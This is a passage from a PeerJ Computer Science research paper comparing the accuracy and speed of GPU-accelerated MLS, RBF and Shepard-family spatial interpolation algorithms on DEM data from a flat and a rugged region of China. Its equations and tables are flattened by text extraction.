neighborhood. And w(x−xk) is the compact-supported weight function. The most commonly used weight functions are the spline functions, for example, the cubic spline weight function (Eq. (3)): w(s̄)=   2 3 −4s̄2+4s̄3, 4 3 −4s̄+4s̄2− 4 3 s̄3, 0, s̄≤ 1 2 1 2 < s̄≤1 s̄>1 (3) where s̄= ssmax and s= x̄−xI . The minimum of J with respect to a(x̄) gives the standard form of MLS approximation: f h(x)= N∑ I=1 φI (x)fI =8(x)F. (4) Orthogonal MLS interpolation algorithm For a given polynomial basis function pi(x), i=1 ,2,···,m, there is an orthonormal basis function qi(x,x̄) that satisfies: q1(x,x̄)=p1(x) qi(x,x̄)=pi(x)− i−1∑ j=1 αij(x,x̄)qj(x,x̄),i=2,3,···,m (5) where αij(x,x̄) is the coefficient that makes qi(x,x̄) perpendicular to qj(x,x̄). αij(x̄)= ∑N k=1wk(x̄)pi(xk)qj(xk,x̄)∑N k=1wk(x̄)q 2 j (xk,x̄) (6) Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 4/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.263 Because the coefficient matrix is a diagonal matrix, the solution for ai(x) does not require matrix inversion, i.e., ai(x̄)= ∑N k=1wk(x̄)qi(xk,x̄)fk∑N k=1wk(x̄)q 2 i (xk,x̄) (7) where ai and aj(x̄) (Eq. (1)) have the same definition. fk and fI (Eq. (2)) have the same definition, i.e., the nodal parameter of f at x =xk. Finally, ai and the orthonormal basis function qi(x,x̄) are fitted into Eq. (1) to obtain the orthogonal MLS approximation f h(x). When the number or order of basis functions increases, only am+1 and αm+1 need to be calculated in Gram–Schmidt orthogonalization (Steve, 2011); recalculation of all entries in the coefficient matrix is not needed. This could reduce the computational cost and the computational error. Lancaster’s MLS interpolation algorithm A singular weight function is adopted to make the approximation function f h(x) constructed by the interpolation type MLS method satisfy the properties of the Kronecker δ function: ω(x,xk)= { ‖(x−xk)/ρk‖ -α , 0, ‖x−xk‖≤ρk ‖x−xk‖>ρk (8) Let p0(x)≡ 1,p1(x),...,pm̄(x) denote the basis function used to construct the approximation function, where the number of basis functions is m̄+1. To implement the interpolation properties, a new set of basis functions is constructed for a given basis function. First, p0(x) are standardized, i.e., p̃0(x,x̄)= 1[∑N k=1ω(x,xk) ]1/2 (9) Then, we construct a new basis function of the following form: p̃i(x,x̄)=pi(x̄)− N∑ k=1 ω(x,xk)∑N l=1ω(x,xl) Pi(xk),i=1,2,...,m̄. (10) RBF-based interpolation algorithm The RBF operates as a spline, essentially fitting a series of piecewise surfaces to approximate a complex terrain. Let X ={x1,x2,...,xN} be a set of pairwise distinct points in a domain �⊆Rd with associated data values fi, i=1 ,2,...,N . We consider the problem of construction a d-variety function F ∈Ck ( Rd ) that interpolates the known data. Specifically, we require F(xi)= fi, i=1,2,...,N . If we take F in the form. F(x)= N∑ j=1 wjϕ (∥∥xi−xj∥∥2) (11) Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 5/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.263 where ϕ : [0,∞]→R is a suitable continuous function, the interpolation conditions become: N∑ j=1 wjϕ (∥∥xi−xj∥∥2)= fi, i=1,2,...,N. (12) Shepard’s interpolation algorithms Shepard (1968) proposed a series of interpolation algorithms on the basis of weighting averages. These algorithms are termed Shepard’s method. The essential idea behind Shepard’s method is to estimate expected values of the interpolation point by weighting averages of the nearby discrete points as follows: Let ( xi,yi ) , i=1 ,2,...,N be the interpolation point and fi be the corresponding value at interpolation point ( xi,yi ) . The expected value f at any point can be expressed as f (x)= N∑ i=1 wi(x)fi∑N j=1wj(x) (13) where w(x) is a weight function. The differences between the different variants of Shepard’s method are in the selection of different weighting functions. In this subsection, four common variants of Shepard’s method will be briefly introduced (Eqs. (14)–(19)). Variant A of Shepard’s interpolation algorithm First, select the influence radius R>0 and let the weight function be w(r)=   1 r , 27 4 ( r R −1 )2 , 0, 0<r ≤ R 3 R 3 <r ≤R r >R (14) Then, a variation of Shepard’s interpolation will be obtained. Variant B of Shepard’s Interpolation Algorithm When employing the following weight function (Eq. (15)), a new variation of Shepard’s interpolation will be obtained. w(s̄)=   2 3 −4s̄2+4s̄3, 4 3 −4s̄+4s̄2− 4 3 s̄3, 0, s̄≤ 1 2 1 2 < s̄≤1 s̄>1 (15) Inverse Distance Weighted (IDW) interpolation algorithm If the weight function is selected as wi(x)= 1 d(x,xi) α (16) the IDW interpolation is obtained. Typically, α=2 in the standard IDW. Where d(x,xi) is the distance between the interpolation point xi and the nearby discrete point x. Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 6/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.263 AIDW interpolation algorithm The Adaptive Inverse Distance Weighted (AIDW) is an improved version of the standard IDW (Shepard, 1968) originated by Lu & Wong (2008). The distance-decay parameter α is no longer a prespecified constant value but is adaptively adjusted for a specific unknown interpolated point according to the distribution of the nearest neighboring data points. The parameter α is taken as α(µR)=   α1, α1[1−5(µR−0.1)]+5α2(µR−0.1), 5α3(µR−0.3)+α2[1−5(µR−0.3)], α3[1−5(µR−0.5)]+5α4(µR−0.5), 5α5(µR−0.7)+α4[1−5(µR−0.7)], α5, 0.0≤µR≤0.1 0.1≤µR≤0.3 0.3≤µR≤0.5 0.5≤µR≤0.7 0.7≤µR≤0.9 0.9≤µR≤1.0 (17) µR=   0, 0.5−0.5cos[π(R(S0)−Rmin)/Rmax], 1, R(S0)≤Rmin Rmin≤R(S0)≤Rmax R(S0)≥Rmax (18) where the α1, α2, α3, α4, α5 are the to-be-assigned five levels or categories of distance decay value. Rmin or Rmax refer to a local nearest neighbor statistic value, and Rmin and Rmax can generally be set to 0.0 and 2.0, respectively. Then, R(S0)= 2 √ N/A k k∑ i=1 di (19) where N is the number of points in the study area, A is the area of the study region, k is the number of nearest neighbor points, di is the nearest neighbor distances and S0 is the location of an interpolated point. METHODS Implementations of the spatial interpolation algorithms We have implemented the spatial interpolation algorithms of RBF (Ding et al., 2018b), MLS (Ding et al., 2018a), IDW (Mei, 2014), and AIDW (Mei, Xu & Xu, 2017) in our previous work. To evaluate the computational performance of the GPU-accelerated interpolation, we implement and compare (1) the sequential implementation, (2) the parallel implementation developed on a multicore CPU, (3) the parallel implementation using a single GPU, and (4) the parallel implementation using multiple GPUs. There are two key ideas behind the presented spatial interpolation algorithm: (1) We use an efficient k-Nearest Neighbor (kNN) search algorithm (Mei, Xu & Xu, 2016) to find the local set of data points for each interpolated point. (2) We employ the local set of data points to compute the prediction value of the interpolated point using different interpolation methods. Mei & Tian (2016) evaluated the impact of different data layouts on the computational efficiency of the GPU-accelerated IDW interpolation algorithm. They implemented three Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 7/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.263 IDW versions of GPU implementations, based upon five data layouts, including the Structure of Arrays (SoA), the Array of Structures (AoS), the Array of aligned Structures (AoaS), the Structure of Arrays of aligned Structures (SoAoS), and a hybrid layout, then they carried out several groups of experiments to evaluate the impact of different data layouts on the interpolation efficiency. Based on their experimental results, the layout SoA is shown in Listing 1. struct Pt { float x[N]; float y[N]; float z[N]; }; struct Pt myPts; Listing 1: The layout SoA The kNN (Cover & Hart, 1967) is a machine learning algorithm often used in classification, the k-Nearest Neighbor means that each data point can be represented by its k nearest neighbor points. In all of the presented interpolation algorithms, for each interpolation point, a local set of data points is found by employing the kNN search procedure and the found local sets of data points are then used to calculate the prediction value of the interpolation point. For large size of DEM, the kNN search algorithm can effectively improve the speed of interpolation by searching only the points near the interpolation points (Mei, Xu & Xu, 2016). Assuming there are m interpolated points and n data points, the process of the kNN search algorithm is as follows: Step 1: the k distances between the k data points and each of the interpolated points are calculated; for example, if the k is set to 5, then there are 5 distances needed to be calculated; see the row (A) in Fig. 1. Step 2: The k distances are sorted in ascending order; see the row (B) in Fig. 1. Step 3: For each of the rest (m-k) data points, (1) The distance d is calculated, for example, the distance is 4.2 (d =4.2); (2) The d with the kth distance are compared: if d < the kth distance, then replace the kth distance with the d (see row (C)); (3) Iteratively compare and swap the neighboring two distances from the kth distance to the 1st distance until all the k distances are newly sorted in ascending order; see the rows (C)–(E) in Fig. 1. Creation of the testing data Two sets of DEM data were downloaded from the Geospatial Data Cloud (http: //www.gscloud.cn//). More specifically, two 30-m resolution DEMs for two 20 km × 20 km regions in Hebei and Sichuan provinces were selected. The topography of Hebei province is mainly plain, while the topography of Sichuan province is mainly mountainous. Two sets of DEM data are derived from remote sensing satellites and compiled by the CNIC Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 8/30 https://peerj.com http://www.gscloud.cn/ http://www.gscloud.cn/ http://dx.doi.org/10.7717/peerj-cs.263 Figure 1 An illustration of the process of the kNN search algorithm. Full-size DOI: 10.7717/peerjcs.263/fig-1 (Computer Network Information Center, Chinese Academy of Sciences). More details on the selected DEMs are presented in Fig. 2. Data points and interpolated points (listed in Tables 1 and 2) are produced as follows: (1) The selected DEMs is imported into the software ArcGIS. (2) A square region S is delimited in selected DEMs. For example, the two 20 km × 20 km regions shown in Fig. 2. (3) Generating the x and y coordinates of randomly determined points by random number generation algorithms in the square region S, and then accessing the corresponding z coordinates from the DEM (the randomly determined points are the data points P1). Evenly distributed (regularly distributed) data points are randomly extracted using the Linear Congruential Random Number Method (Lehmer, 1949), and normally distribution (irregularly distributed, mathematical expectation µ= 10,000, standard deviation σ = 3,333) data points are randomly extracted using the Box–Muller Method (Box & Muller, 1958). For example, we set Size 1, the extracted regularly distributed data points P1 = 249,990 (Table 1), and density is P1/S0 (S0 is the area of S, and S0 is a fixed value, where S0 = 20 km × 20 km). (4) The square region S is triangulated into a planar triangular mesh using the Del auney algorithm (Watson, 1981), the mesh nodes are considered to be the interpolation points, with known x and y coordinates and unknown z coordinates, the unknown z coordinates is the estimated value to be obtained by interpolation. According to the randomly sampled points obtained in Step 3, we use the interpolation method mentioned in ‘Background’ to interpolate. Then, the corresponding exact elevation of the interpolation point is obtained by accessing the z value of the DEM at the associated x and y coordinates. Finally, the z values at the mesh points are used as control for testing the accuracy of the interpolated z values. To quantitatively determine regular and irregular point sampling, Average Nearest Neighbor analysis (Ebdon, 1985) is applied. In the proposed method, Nearest Neighbor Ratio (NNR) is used to evaluate the distribution pattern of sample points: if the NNR > 1, the distribution pattern shows clustered; if the NNR < 1, the distribution pattern shows Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 9/30 https://peerj.com https://doi.org/10.7717/peerjcs.263/fig-1 http://dx.doi.org/10.7717/peerj-cs.263 Figure 2 The selected Zone 1 and Zone 2. (A) 2.5D model of the Zone 1 study area and (B) 2.5D model of the Zone 2 study area. Full-size DOI: 10.7717/peerjcs.263/fig-2 dispersed. As listed in Table 3, the NNR of regularly-distributed, approximately 1.001, is greater than 1, the distribution pattern is dispersed (Fig. 3A), that is regularly-distributed; the NNR of irregularly-distributed, approximately 0.78, is less than 1, the distribution pattern is clustered (Fig. 3B), that is irregularly-distributed. Zone 1 (Flat Zone) The first selected region is located in Hengshui City, Hebei Province. The DEM of this region has the identifier ASTGTM_N37E115 and is derived from the Geospatial Data Cloud (http://www.gscloud.cn/). The location and elevation of this region is illustrated in Fig. 2. In the region, the highest elevation is 48 m and the lowest is 8 m. We translated the Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 10/30 https://peerj.com https://doi.org/10.7717/peerjcs.263/fig-2 http://www.gscloud.cn/ http://dx.doi.org/10.7717/peerj-cs.263 Table 1 Ten used groups of experimental testing data in the Flat zone. Data set Number of data points Number of interpolated points Size 1 249,990 259,496 Size 2 499,975 529,080 Size 3 999,883 1,036,780 Size 4 1,499,750 1,540,373 Regularly- distributed Size 5 1,999,566 2,000,520 Size 1 249,920 259,496 Size 2 499,751 529,080 Size 3 998,840 1,036,780 Size 4 1,497,397 1,540,373 Irregularly- distributed Size 5 1,995,531 2,000,520 Table 2 Ten used groups of experimental testing data in the Rugged zone. Data set Number of data points Number of interpolated points Size 1 249,994 259,496 Size 2 499,970 529,080 Size 3 999,884 1,036,780 Size 4 1,499,746 1,540,373 Regularly- distributed Size 5 1,999,544 2,000,520 Size 1 249,924 259,496 Size 2 499,728 529,080 Size 3 998,867 1,036,780 Size 4 1,497,444 154,0373 Irregularly- distributed Size 5 1,995,443 2,000,520 Table 3 The NNR of regular and irregular point sampling. Data set Flat zone Rugged zone Size 1 1.001731 1.001170 Size 2 1.001219 1.001291 Size 3 1.001437 1.001173 Size 4 1.001987 1.001758 Regularly- distributed Size 5 1.002431 1.001869 Size 1 0.783242 0.781741 Size 2 0.782947 0.784534 Size 3 0.783653 0.784086 Size 4 0.784653 0.784056 Irregularly- distributed Size 5 0.783745 0.784888 Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 11/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.263 Significant Significant(Random) Clustered Random Dispersed Significance Level (p-value) Critical Value (z-score) 0.01 0.05 0.10 --- 0.10 0.05 0.01 <-2.58 -2.58--1.96 -1.96--1.65 -1.65-1.65 1.65-1.96 1.96-2.58 >2.58 Significant Significant(Random) Clustered Random Dispersed Significance Level (p-value) Critical Value (z-score) 0.01 0.05 0.10 --- 0.10 0.05 0.01 <-2.58 -2.58--1.96 -1.96--1.65 -1.65-1.65 1.65-1.96 1.96-2.58 >2.58 A B Figure 3 The distribution patterns determined by the Average Nearest Neighbor analysis. (A) Regu- larly distributed and (B) irregularly distributed. Full-size DOI: 10.7717/peerjcs.263/fig-3 X coordinate by 348,000 and the Y coordinate by 4,130,000 to obtain a 20 km ×20 km square area centered on the origin. Five sets of benchmark test data were generated in this region; see Table 1. Zone 2 (Rugged Zone) The second selected region is located in Ganzi Tibetan Autonomous Prefecture, Sichuan Province. The DEM of this region has the identifier ASTGTM_N29E099 and is derived from the Geospatial Data Cloud (http://www.gscloud.cn/). The location and elevation of this region is illustrated in Fig. 2. In the region, the highest elevation is 5,722 m and the lowest is 3,498 m. We translated the X coordinate by 570,000 and the Y coordinate by 3,300,000 to obtain a 20 km ×20 km square area centered on the origin. Five sets of benchmark test data are generated in this region; see Table 2. Criteria for comparison In this paper, we evaluate the interpolation algorithms described in ‘Background’ by: (1) comparing the interpolation accuracy and efficiency when the terrain is gentle and rugged, and (2) comparing the interpolation accuracy and efficiency when data points are evenly distributed and nonuniformly distributed. The accuracy of each interpolation method is analyzed by comparing the elevation values predicted by the interpolation algorithms with the real DEM elevation value. The efficiency of each interpolation method is compared by benchmarking the running time of Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 12/30 https://peerj.com https://doi.org/10.7717/peerjcs.263/fig-3 http://www.gscloud.cn/ http://dx.doi.org/10.7717/peerj-cs.263 Table 4 Specifications of the workstation and the software used for the experimental tests. Specifications Details CPU Intel Xeon E5-2650 v3 CPU Frequency 2.30 GHz CPU RAM 144 GB CPU Core 40 GPU Quadro M5000 GPU Memory 8 GB GPU Core 2048 OS Windows 7 Professional Compiler Visual Studio 2010 CUDA Version v8.0 different implementations developed in sequence, on a multicore CPU, on a single GPU, and on multiple GPUs. RESULTS Experimental environment To evaluate the computational performance of the presented various parallel interpolations, we conducted ten groups of experimental tests in both the flat zone and the rugged zone on a powerful workstation equipped with two Quadro M5000 GPUs. The specifications of the workstations are listed in Table 4. Test results of interpolation accuracy for different interpolation algorithms In this paper, we adopt the Normalized Root-Mean-Square-Error (NRMSE) as the metric to measure the interpolation accuracy of the different interpolation algorithms. The NRMSE is defined in Eq. (20). Normalized Root-Mean-Square-Error (NRMSE): NRMSE = 1 max1≤i≤Ni ∣∣fa∣∣ √√√√ 1 Ni Ni∑ i=1 ∣∣fn−fa∣∣2 (20) where Ni is the number of interpolated points, fa is the theoretically exact solution of the ith interpolated point (the elevation of the DEM at this point), and fn is the predicted value of the ith interpolated point. The interpolation accuracy of the ten groups of experimental tests is listed in Table 5. The numerical value shown in Table 5 is NRMSE, which means that the smaller the numerical value, the higher the interpolation accuracy. As listed in Table 5, the most accurate interpolation algorithm is the MLS interpolation algorithm. For the small size (Size 1), compared with other two algorithms, the MLS algorithm is 13.1%–49.4% more accurate than the RBF algorithm, and it is 2.1%–75.8% more accurate than the Shepard’s algorithm. On the other hand, for the same algorithm, when the distribution pattern is the same, its accuracy in the flat area is higher than that Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 13/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.263 Table 5 Interpolation accuracy of the parallel interpolation algorithms implemented on a single GPU. Data set Original MLS Orthogonal MLS Lancaster’s MLS kNN RBF kNN AIDW kNN IDW kNN shepard1 kNN shepard2 Size 1 7.49E−5 7.49E−5 7.50E−5 9.23E−5 1.06E−4 1.07E−4 1.05E−4 1.03E−4 Size 2 6.25E−5 6.25E−5 6.03E−5 6.85E−5 7.92E−5 7.98E−5 7.81E−5 7.80E−5 Size 3 5.52E−5 5.52E−5 5.23E−5 5.67E−5 6.17E−5 6.19E−5 6.15E−5 6.23E−5 Size 4 5.16E−5 5.16E−5 4.88E−5 5.24E−5 5.45E−5 5.46E−5 5.47E−5 5.58E−5 Regularly dis- tributed Size 5 4.91E−5 4.91E−5 4.64E−5 4.99E−5 5.05E−5 5.05E−5 5.08E−5 5.20E−5 Size 1 1.96E−4 1.96E−4 1.86E−4 2.14E−4 1.90E−4 1.95E−4 1.98E−4 2.02E−4 Size 2 1.53E−4 1.53E−4 1.48E−4 1.71E−4 1.57E−4 1.60E−4 1.62E−4 1.65E−4 Size 3 1.20E−4 1.20E−4 1.15E−4 1.36E−4 1.28E−4 1.31E−4 1.32E−4 1.33E−4 Size 4 1.07E−4 1.07E−4 1.02E−4 1.21E−4 1.15E−4 1.17E−4 1.18E−4 1.19E−4 Flat zone Irregularly- distributed Size 5 9.50E−5 9.50E−5 9.14E−5 1.07E−4 1.05E−4 1.05E−4 1.06E−4 1.07E−4 Size 1 2.23E−4 2.23E−4 2.58E−4 4.41E−4 9.21E−4 9.26E−4 9.43E−4 9.69E−4 Size 2 1.23E−4 1.23E−4 1.35E−4 2.35E−4 6.13E−4 6.16E−4 6.35E−4 6.63E−4 Size 3 9.09E−5 9.09E−5 9.07E−5 1.37E−4 4.13E−4 4.12E−4 4.33E−4 4.58E−4 Size 4 8.13E−5 8.13E−5 7.99E−5 1.08E−4 3.31E−4 3.30E−4 3.50E−4 3.71E−4 Regularly- distributed Size 5 7.62E−5 7.62E−5 7.48E−5 9.39E−5 2.85E−4 2.83E−4 3.02E−4 3.21E−4 Size 1 3.37E−3 3.37E−3 3.02E−3 3.99E−3 4.06E−3 4.12E−3 4.11E−3 4.07E−3 Size 2 1.98E−3 1.98E−3 1.88E−3 2.96E−3 3.49E−3 3.55E−3 3.57E−3 3.52E−3 Size 3 1.03E−3 1.03E−3 1.10E−3 1.56E−3 2.02E−3 2.05E−3 2.04E−3 2.02E−3 Size 4 8.15E−4 8.15E−4 8.21E−4 1.16E−3 1.70E−3 1.70E−3 1.68E−3 1.67E−3 Rugged zone Irregularly- distributed Size 5 6.33E−4 6.33E−4 6.59E−4 9.78E−4 1.35E−3 1.36E−3 1.36E−3 1.37E−3 the rugged area. For example, for the MLS algorithm, when the distribution pattern is nonuniformly distributed, the accuracy of the Lancaster’ MLS algorithm in the flat area is approximately 90% higher than that of the Lancaster’ MLS algorithm in the rugged area. As shown in Figs. 4 and 5, the NRMSEs of various interpolation methods for the regularly distributed are less than 50% of the NRMSEs of various interpolation methods for the irregularly distributed. The above behavior becomes even more obvious in the rugged zone than in the flat zone. Thus, the regular distribution provides a more accurate solution for both the rugged and the flat areas. Test results of computational efficiency for different interpolation algorithms In our experimental tests, the value of k is 20. Those twenty groups of experimental tests were performed on the workstations mentioned above. The running times and corresponding speedups of each group of experimental tests are presented in the following section. The speedup is defined in Eq. (21). speedup= Tseq Tpar (21) where Tseq is the running time of sequential implementation, and Tpar is the running time of parallel implementation. Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 14/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.263 Figure 4 Interpolation accuracy of GPU-accelerated interpolation algorithms in the Flat zone. (A) Regularly distributed and (B) irregularly distributed. Full-size DOI: 10.7717/peerjcs.263/fig-4 Figure 5 Interpolation accuracy of GPU-accelerated interpolation algorithms in the Rugged zone. (A) Regularly distributed and (B) irregularly distributed. Full-size DOI: 10.7717/peerjcs.263/fig-5 Computational efficiency of sequential implementations As listed in Table 6, for the sequential version, when giving the same sets of data points and interpolation points, the order of computational time from fastest to slowest is: the Shepard’s interpolation method, the MLS interpolation, and the RBF interpolation. The computational time of Shepard’s interpolation method is approximately 20% less than the MLS interpolation method, and it is approximately 70% less than the computational time of the computational time of RBF interpolation method. Computational efficiency of parallel implementations As shown in Figs. 6– 11, the parallel version developed on multi-GPUs has the highest speedup in the three parallel versions. Except for the RBF interpolation method, the maximum speedups of other interpolation algorithms are greater than 45. Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 15/30 https://peerj.com https://doi.org/10.7717/peerjcs.263/fig-4 https://doi.org/10.7717/peerjcs.263/fig-5 http://dx.doi.org/10.7717/peerj-cs.263 Table 6 Running time (ms) of sequential implementations. Data set Original MLS Orthogonal MLS Lancaster’s MLS kNN RBF kNN AIDW kNN IDW kNN shepard1 kNN shepard2 Size 1 1,571.33 1,501.67 1,613.00 4,194.33 1,520.67 1,239.00 1,290.67 1,270.33 Size 2 3,253.33 3,238.33 3,330.33 8,547.33 3,100.67 2,475.67 2,618.33 2,583.00 Size 3 6,355.67 6,063.33 6,487.67 16,610.67 6,154.67 4,957.33 5,196.33 5,125.33 Size 4 9,462.00 9,036.67 9,670.33 24,856.67 9,161.33 7,359.00 7,754.67 7,674.00 Regularly- distributed Size 5 12,403.33 11,854.00 12,725.33 32,370.33 12,050.67 9,643.33 10,230.67 10,058.00 Size 1 1,458.33 1,392.00 1,500.00 4,028.67 1,409.00 1,104.33 1,177.33 1,157.67 Size 2 3,042.33 2,919.67 3,115.00 8,291.33 2,923.00 2,300.33 2,430.67 2,397.33 Size 3 6,067.00 5,738.00 6,129.00 16,299.33 5,783.67 4,559.00 4,834.67 4,776.33 Size 4 8,856.00 8,491.33 9,142.00 24,286.00 8,636.33 6,779.33 7,211.33 7,105.00 Flat zone Irregularly- distributed Size 5 11,706.00 11,214.00 12,031.33 31,744.00 11,354.00 8,922.00 9,498.00 9,372.67 Size 1 1,576.00 1,497.67 1,605.33 4,148.00 1,512.67 1,204.67 1,278.00 1,264.00 Size 2 3,211.33 3,131.00 3,285.33 8,452.33 3,117.33 2,620.33 2,695.33 2,582.67 Size 3 6,354.33 6,064.67 6,500.33 16,649.33 6,139.67 4,898.00 5,200.33 5,127.67 Size 4 9,444.67 9,026.67 9,662.33 24,811.67 9,187.00 7,293.33 7,710.33 7,660.33 Regularly- distributed Size 5 12,416.67 11,853.33 12,711.33 32,372.67 12,008.33 9,606.33 10,205.67 10,062.00 Size 1 1,503.00 1,408.00 1,516.00 4,060.33 1,424.00 1,117.33 1,191.67 1,214.67 Size 2 3,032.33 2,883.33 3,110.33 8,274.33 2,925.67 2,277.00 2,424.00 2,391.33 Size 3 5,943.33 5,704.67 6,089.33 16,226.67 5,746.33 4,534.00 4,800.33 4,735.67 Size 4 8,920.00 8,524.33 9,132.33 24,262.00 8,654.67 6,781.67 7,224.00 7,115.67 Rugged zone Irregularly- distributed Size 5 11,632.33 11,147.33 11,925.33 31,612.00 11,282.33 8,885.33 9,435.67 9,320.33 Figure 6 Comparison of the speedups of the parallel implementations developed on a multicore CPU in the Flat zone. (A) Regularly distributed and (B) irregularly distributed. Full-size DOI: 10.7717/peerjcs.263/fig-6 Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 16/30 https://peerj.com https://doi.org/10.7717/peerjcs.263/fig-6 http://dx.doi.org/10.7717/peerj-cs.263 Figure 7 Comparison of the speedups of the parallel implementations developed on a multicore CPU in the Rugged zone. (A) Regularly distributed and (B) irregularly distributed. Full-size DOI: 10.7717/peerjcs.263/fig-7 Figure 8 Comparison of the speedups of the parallel implementations developed on a single GPU in the Flat zone. (A) Regularly distributed and (B) irregularly distributed. Full-size DOI: 10.7717/peerjcs.263/fig-8 As shown in Figs. 12 and 13, for the parallel version developed on multi-GPUs, the order of the computational time from fastest to slowest is: the Shepard’s interpolation, the MLS interpolation, the RBF interpolation method. The computational time of Shepard’s interpolation method is 3%–30% less than the computational time of the MLS interpolation method, and it is 70%–85% less than the computational time of the RBF interpolation method. Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 17/30 https://peerj.com https://doi.org/10.7717/peerjcs.263/fig-7 https://doi.org/10.7717/peerjcs.263/fig-8 http://dx.doi.org/10.7717/peerj-cs.263 Figure 9 Comparison of the speedups of the parallel implementations developed on a single GPU in the Rugged zone. (A) Regularly distributed and (B) irregularly distributed. Full-size DOI: 10.7717/peerjcs.263/fig-9 Figure 10 Comparison of the speedups of the parallel implementations developed on multi-GPUs in the Flat zone. (A) Regularly distributed and (B) irregularly distributed. Full-size DOI: 10.7717/peerjcs.263/fig-10 DISCUSSION The interpolation accuracy and computational efficiency are two critical issues that should be considered first in any interpolation algorithms. The interpolation accuracy should first be satisfied; otherwise, numerical analysis results would be inaccurate. In addition, the computational efficiency should be practical. More specifically, in the subsequent section we will analyze (1) the interpolation accuracy of the presented eight GPU-accelerated interpolation algorithms with different data sets and (2) the computational efficiency of the presented eight interpolation algorithms. Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 18/30 https://peerj.com https://doi.org/10.7717/peerjcs.263/fig-9 https://doi.org/10.7717/peerjcs.263/fig-10 http://dx.doi.org/10.7717/peerj-cs.263 Figure 11 Comparison of the speedups of the parallel implementations developed on multi-GPUs in the Rugged zone. (A) Regularly distributed and (B) irregularly distributed. Full-size DOI: 10.7717/peerjcs.263/fig-11 Figure 12 Comparison of the running time of the parallel implementations developed on multi-GPUs in the Flat zone. (A) Regularly distributed and (B) irregularly distributed. Full-size DOI: 10.7717/peerjcs.263/fig-12 Comparison of interpolation accuracy To better compare the accuracy of the described interpolation algorithms, in the case of the highest sample density (Size 5) and the lowest sample density (Size 1), we listed those algorithms with the highest accuracy (i.e., the minimum NRMSE) in Table 7. As listed in Table 7, for lower sample density (Size 1), the Original MLS algorithm has the best interpolation performance in regularly distributed. However, for higher sample density (Size 5), in general, the improved MLS algorithm Lancaster’s MLS has higher interpolation accuracy than the Original MLS. In particular, the Original MLS has best accuracy in the rugged zone with irregularly distributed interpolation points. On the other hand, for Shepard’s interpolation algorithms, the kNNAIDW is an improved version of the IDW, which can adaptively determine the power parameter Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 19/30 https://peerj.com https://doi.org/10.7717/peerjcs.263/fig-11 https://doi.org/10.7717/peerjcs.263/fig-12 http://dx.doi.org/10.7717/peerj-cs.263 Figure 13 Comparison of the running time of the parallel implementations developed on multi-GPUs in the Rugged zone. (A) Regularly distributed and (B) irregularly distributed. Full-size DOI: 10.7717/peerjcs.263/fig-13 Table 7 The algorithm with the highest accuracy in congeneric algorithms and its corresponding NRMSE. Data set MLS algorithm RBF algorithm Shepard’s interpolation algorithm Regularly- distributed Size 1 Original MLS (7.49E–5) kNNRBF (9.23E–5) kNNShepard2 (1.03E–4) Flat zone Size 5 Lancaster’s MLS (4.64E–5) kNNRBF (4.99E–5) kNNAIDW (5.05E–5) Irregularly distributed Size 1 Lancaster’s MLS (1.86E–4) kNNRBF (2.14E–4) kNNAIDW (1.90E–4) Size 5 Lancaster’s MLS (9.14E–5) kNNRBF (1.07E–4) kNNAIDW (1.05E–4) Regularly- distributed Size 1 Original MLS (2.23E–4) kNNRBF (4.41E–4) kNNAIDW (9.21E–4)Rugged zone Size 5 Lancaster’s MLS (7.48E–5) kNNRBF (9.39E–5) kNNIDW (2.83E–4) Irregularly- distributed Size 1 Lancaster’s MLS (3.02E–3) kNNRBF (3.99E–3) kNNAIDW (4.06E–3) Size 5 Original MLS (6.33E–4) kNNRBF (9.78E–4) kNNAIDW (1.35E–3) according to the spatial points’ distribution pattern. Therefore, in Shepard’s interpolation algorithms, the kNNAIDW has higher accuracy in most situations. Although under some specific conditions, the kNNShepard2 and kNNIDW have higher accuracy than kNNAIDW, the accuracy of kNNAIDW is quite similar to them. As listed Table 7. For the same flat zone, when the data points are uniformly distributed, the order of the interpolation accuracy from high to low is: the MLS interpolation algorithm, RBF, and Shepard’s interpolation method; when the data points are normal distribution, the order of the interpolation accuracy from high to low is: the MLS interpolation algorithm, Shepard’s interpolation method, and RBF. For the same rugged zone, regardless of the Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 20/30 https://peerj.com https://doi.org/10.7717/peerjcs.263/fig-13 http://dx.doi.org/10.7717/peerj-cs.263 Figure 14 Frequency distribution of the Relative Error for the parallel implementation developed on a single GPU in the Flat zone. (A) Regularly distributed and (B) irregularly distributed. The size of data points: Size 1. Full-size DOI: 10.7717/peerjcs.263/fig-14 density and distribution of the data points, the interpolation accuracy order from high to low is: the MLS interpolation algorithm, RBF, and Shepard’s interpolation method. To further verify the above conclusions obtained from NRMSE, we investigated the relative error of the interpolated results for the same set of data points and interpolation points (i.e., Size 1). The algorithm with the highest accuracy (i.e., the minimum NRMSE) is used to represent the kind of algorithm. As shown in Figs. 14 and 15, the Y axis is the lgN (N is the count of relative error), and the X axis is the relative error e. The e is defined in Eq. (22). ei= ∣∣∣∣fn−fafa ∣∣∣∣×100% (22) where fa is the theoretically exact solution of the ith 